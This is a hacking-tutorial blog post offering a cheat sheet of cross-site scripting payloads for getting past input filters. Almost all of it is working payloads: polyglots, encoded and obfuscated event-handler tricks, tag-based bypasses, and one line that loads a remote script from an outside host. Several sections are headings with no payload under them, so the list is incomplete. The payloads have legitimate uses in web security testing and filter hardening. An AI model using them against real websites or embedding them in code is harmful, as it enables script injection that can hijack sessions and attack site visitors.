Hacking Tutorials XSS

XSS Filter Bypass Cheat Sheet

As I promised here is the ultimate cheat sheet for bypassing XSS filters.
If you don’t understand what I am saying than you should read these articles:

1. Cross Site Scripting (XSS) : Getting Started
2. Bypassing XSS Filters : Part 1
3. Bypassing XSS Filters : Part 2

Quick XSS Payloads

You can use these payloads when you want to quickly check for XSS in a webpge.

Filter Check
It will check which characters are being filter. It also checks if <script>
tag is blocked or not.


XSS Tester: Alert XSS Statment
This payload will try to close tags and bypass basic filters to execute an alert box.


XSS Polyglot 1
It is my custom payload which tries to bypass basic filters by closing tags and using different types of payloads.

<img src="https://teamultimate.in/wp-content/uploads/2017/03/slide-main.png">
<INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');">

XSS Polyglot 2

//'/<@/></script></div></script>--><select */onclick=alert()><o>1<o>2')//"<!--

XSS Polyglot 3

<svg onload="void 'javascript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d
%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e'; "></svg>

List Of Payloads

Without quotes and semicolons
Use when quotes and semicolons are being filtered.

<IMG SRC=javascript:alert('XSS')>

Without any quotes

<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>

Defeats tag checking


Without closing tag

<SCRIPT SRC=http://xss.rocks/xss.js?< B >

Using body tag

<BODY ONLOAD=alert('XSS')>

Using video tag

<video src=_ onloadstart="alert(1)">

Using table tag

<TABLE BACKGROUND="javascript:alert('XSS')">

Closing script tag


When script tag is being filtered


Triple URL Encoding


JS-F**CK Payload


Using On wheel event with body tag

<body style="height:1000px" onwheel="[DATA]">

Using (&NewLine;) and (&NewTab;) with <a> tag

<a href="j[785 bytes of (&NewLine;&Tab;)]avascript:alert(1);">XSS</a>

Using OnDrag with Unicode Encoding

--><d/ /ondrag=co\u006efir\u006d(2)>hello.

Spaces and meta chars before the JavaScript in images for XSS

<IMG SRC=" &#14;  javascript:alert('XSS');">

Here are some other payloads:

"><img src=x onerror=prompt(1)>
"><h1 onclick=prompt(1)>Clickme</h1>
"><a href=javascript:prompt(1)>Clickme</a>
"><a href="javascript:confirm%28 1%29">Clickme</a>
"><a href="data:text/html;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoMik+">click</a>
"><textarea autofocus onfocus=prompt(1)>
"><img src=x onerror=co\u006efir\u006d`1`>
"><iframe/src=javascript:co\u006efir\u006d%28 1%29>
"><h1 onclick=co\u006efir\u006d(1)>Clickme</h1>
"><a href=javascript:prompt%28 1%29>Clickme</a>
"><a href="javascript:co\u006efir\u006d%28 1%29">Clickme</a>
"><textarea autofocus onfocus=co\u006efir\u006d(1)>
"><iframe srcdoc="&lt;img src&equals;x:x onerror&equals;alert&lpar;1&rpar;&gt;">

The list ends here but I will add more payloads later.
Thanks for reading.
Also Read: How I Hacked Someone With Phishing Who Was Aware About Phishing

About the author


I am Somdev Sangwan also known as D3V. I am n00b and I love computers and hacking. I am a python freak and your friendly neighborhood hacker.

Add Comment

Click here to post a comment

Subscribe Now

Subscribe for free and get latest articles delivered right into your inbox.

Thank you for subscribing.

Something went wrong.